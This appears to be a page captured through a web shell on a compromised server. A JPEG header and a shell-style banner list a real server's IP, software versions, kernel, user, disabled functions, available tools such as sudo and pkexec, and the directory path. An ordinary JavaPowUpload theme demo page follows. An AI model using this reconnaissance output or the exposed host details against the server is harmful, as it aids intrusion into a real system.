????JFIF??x?x????'
Server IP : 79.136.114.73 / Your IP : 13.59.50.189 Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64 User : www-data ( 33) PHP Version : 5.5.9-1ubuntu4.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /var/www/icad.astacus.se/productionzon/JavaPowUpload/ |
Upload File : |
<!-- saved from url=(0014)about:internet --> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>Look and feel example</title> <link rel="stylesheet" href="styles.css"> </head> <body> Sample: <b>skin.html</b> <a href="javascript:location.reload(true);"><img border="0" src="images/refresh.png" width="16" height="16"> Refresh frame</a> <a target="_parent" href="index.htm"><img border="0" src="images/home.png" width="16" height="16"> Examples home</a><br/><br/> The example demonstrates how to apply ready-made theme pack for JavaPowUpload interface.<br> You can find other themes <a href="http://javootoo.l2fprod.com/plaf/skinlf/themepacks/index.html" target="_blank">here</a>. Just download zip file and place to themes/ folder. <br> <br> <select name="themepath" id="themepath"> <option value="amarachthemepack.zip">amarachthemepack.zip</option> <option value="aquathemepack.zip">aquathemepack.zip</option> <option value="architectBluethemepack.zip">architectBluethemepack.zip</option> <option value="architectOlivethemepack.zip">architectOlivethemepack.zip</option> <option value="b0sumiErgothempack.zip">b0sumiErgothempack.zip</option> <option value="b0sumiErgothempack.zip">b0sumithemepack.zip</option> <option value="bbjthemepack.zip">bbjthemepack.zip</option> <option value="beigeazulthemepack.zip">beigeazulthemepack.zip</option> <option value="BeOSthemepack.zip">BeOSthemepack.zip</option> <option value="blueMetalthemepack.zip">blueMetalthemepack.zip</option> <option value="blueTurquesathemepack.zip">blueTurquesathemepack.zip</option> <option value="cellshadedthemepack.zip">cellshadedthemepack.zip</option> <option value="chaNinja-Bluethemepack.zip">chaNinja-Bluethemepack.zip</option> <option value="coronaHthemepack.zip">coronaHthemepack.zip</option> <option value="cougarthemepack.zip">cougarthemepack.zip</option> <option value="crystal2themepack.zip">crystal2themepack.zip</option> <option value="fatalEthemepack.zip">fatalEthemepack.zip</option> <option value="gfxOasisthemepack.zip">gfxOasisthemepack.zip</option> <option value="gorillathemepack.zip">gorillathemepack.zip</option> <option value="hmmXPBluethemepack.zip">hmmXPBluethemepack.zip</option> <option value="hmmXPMonoBluethemepack.zip">hmmXPMonoBluethemepack.zip</option> <option value="iBarthemepack.zip">iBarthemepack.zip</option> <option value="macosthemepack.zip">macosthemepack.zip</option> <option value="midnightthemepack.zip">midnightthemepack.zip</option> <option value="mmMagra-Xthemepack.zip">mmMagra-Xthemepack.zip</option> <option value="modernthemepack.zip">modernthemepack.zip</option> <option value="oliveGreenLunaXPthemepack.zip">oliveGreenLunaXPthemepack.zip</option> <option value="opusLunaSilverthemepack.zip">opusLunaSilverthemepack.zip</option> <option value="opusOSBluethemepack.zip">opusOSBluethemepack.zip</option> <option value="opusOSDeepthemepack.zip">opusOSDeepthemepack.zip</option> <option value="opusOSOlivethemepack.zip">opusOSOlivethemepack.zip</option> <option value="quickSilverRthemepack.zip">quickSilverRthemepack.zip</option> <option value="roueBluethemepack.zip">roueBluethemepack.zip</option> <option value="roueBrownthemepack.zip">roueBrownthemepack.zip</option> <option value="roueGreenthemepack.zip">roueGreenthemepack.zip</option> <option value="royalInspiratthemepack.zip">royalInspiratthemepack.zip</option> <option value="silverLunaXPthemepack.zip">silverLunaXPthemepack.zip</option> <option value="solunaRthemepack.zip">solunaRthemepack.zip</option> <option value="themepack.zip">themepack.zip</option> <option value="tigerGraphitethemepack.zip">tigerGraphitethemepack.zip</option> <option value="tigerthemepack.zip">tigerthemepack.zip</option> <option value="toxicthemepack.zip">toxicthemepack.zip</option> <option value="underlingthemepack.zip">underlingthemepack.zip</option> <option value="whistlerthemepack.zip">whistlerthemepack.zip</option> <option value="xplunathemepack.zip">xplunathemepack.zip</option> </select> <input name="submitbtn" type="button" onClick="javascript: applyTheme();" value="Apply this theme!" > <script language="JavaScript"> function applyTheme() { var JavaPowUpload = document.getElementById("JavaPowUpload"); JavaPowUpload.setSkin("Extra/themes/"+document.getElementById("themepath").value); } </script> <br><br> <!--lib/JavaPowUpload.jar - main jar file, should always be included Optional jar files: lib/skinlf.jar - for themes support lib/commons-compress.jar - compression before upload lib/commons-httpclient.jar - http upload functionality lib/commons-net-ftp.jar - FTP protocol support --> <applet code="com.elementit.JavaPowUpload.Manager" archive="lib/skinlf.jar, lib/commons-httpclient.jar, lib/JavaPowUpload.jar" width="500" height="300" name="JavaPowUpload" id="JavaPowUpload" mayscript="true" alt="JavaPowUpload by www.element-it.com" VIEWASTEXT> <!-- Java Plug-In Options --> <param name="progressbar" value="true"> <param name="boxmessage" value="Loading JavaPowUpload Applet ..."> <param name="Common.SerialNumber" value="put your serial number here"> <!--Enable upload mode --> <param name="Common.UploadMode" value="true"> <!--Set url to file processing script --> <param name="Upload.UploadUrl" value="FileProcessingScripts/PHP/uploadfiles.php"> <param name="Common.SkinLF.ThemepackURL" value="lib/themepack.zip"> <!-- This text will be shown if applet not working or Java not installed--> <span style="border:1px solid #FF0000;display:block;padding:5px;margin-top:10px;margin-bottom:10px;text-align:left; background: #FDF2F2;color:#000;">You should <b>enable applets</b> running at browser and to have the <b>Java</b> (JRE) version >= 1.5.<br />If applet is not displaying properly, please check <a target="_blank" href="http://java.com/en/download/help/testvm.xml" title="Check Java applets">additional configurations</a></span> </applet> <br /> The file uploader doesn’t work? See <a target="_blank" href="http://www.element-it.com/OnlineHelpJavaPowUpload/Troubleshooting.html">here</a> what you need for its proper work. <br/> <a href="index.htm"><<Return to the samples list</a> </body> </html>